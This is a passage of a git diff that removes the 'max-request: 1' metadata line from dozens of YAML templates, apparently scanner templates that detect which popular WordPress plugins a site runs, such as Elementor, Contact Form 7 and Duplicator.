tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3d0073b5a5..58d5c881d0 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 